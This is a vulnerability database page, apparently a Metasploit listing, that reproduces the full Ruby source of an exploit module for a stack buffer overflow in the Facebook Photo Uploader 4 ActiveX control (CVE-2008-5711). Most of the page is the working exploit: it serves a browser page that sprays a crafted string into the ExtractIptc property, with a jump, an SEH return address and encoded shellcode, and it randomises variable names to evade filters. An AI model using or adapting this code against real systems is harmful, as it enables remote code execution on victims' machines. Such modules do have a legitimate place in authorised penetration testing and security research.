Facebook Photo Uploader 4 ActiveX Control Buffer Overflow

2008-02-07T23:08:14
ID MSF:EXPLOIT/WINDOWS/BROWSER/FACEBOOK_EXTRACTIPTC
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the "ExtractIptc()" property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Facebook Photo Uploader 4.
        By sending an overly long string to the "ExtractIptc()" property located
        in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute
        arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2008-5711' ],
          [ 'OSVDB', '41073' ],
          [ 'BID', '27534' ],
          [ 'EDB', '5049' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 800,
          'BadChars'      => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English',     { 'Ret' => 0x74c9de3e } ], # 02/07/08
        ],									               # ./msfpescan -i /tmp/oleacc.dll | grep SEHandler
      'DisclosureDate' => 'Jan 31 2008',
      'DefaultTarget'  => 0))
  end

  def autofilter
      false
  end

  def check_dependencies
      use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    vname	  = rand_text_alpha(rand(100) + 1)
    strname = rand_text_alpha(rand(100) + 1)
    rand1   = rand_text_alpha(rand(100) + 1)
    rand2   = rand_text_alpha(rand(100) + 1)
    rand3   = rand_text_alpha(rand(100) + 1)
    rand4   = rand_text_alpha(rand(100) + 1)

    # Set the exploit buffer
    filler  = Rex::Text.to_unescape(rand_text_alpha(2))
    jmp     = Rex::Text.to_unescape([0x969606eb].pack('V'))
    ret     = Rex::Text.to_unescape([target.ret].pack('V'))
    sc      = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Build out the message
    content = %Q|<html>
<object classid='clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0' id='#{vname}'></object>
<script language='javascript'>
#{rand1} = unescape('#{filler}');
while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}');
#{rand2} = unescape('#{jmp}');
#{rand3} = unescape('#{ret}');
#{rand4} = unescape('#{sc}');
#{strname} = #{rand1} + #{rand2} + #{rand3} + #{rand4};
#{vname}.ExtractIptc = #{strname};
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end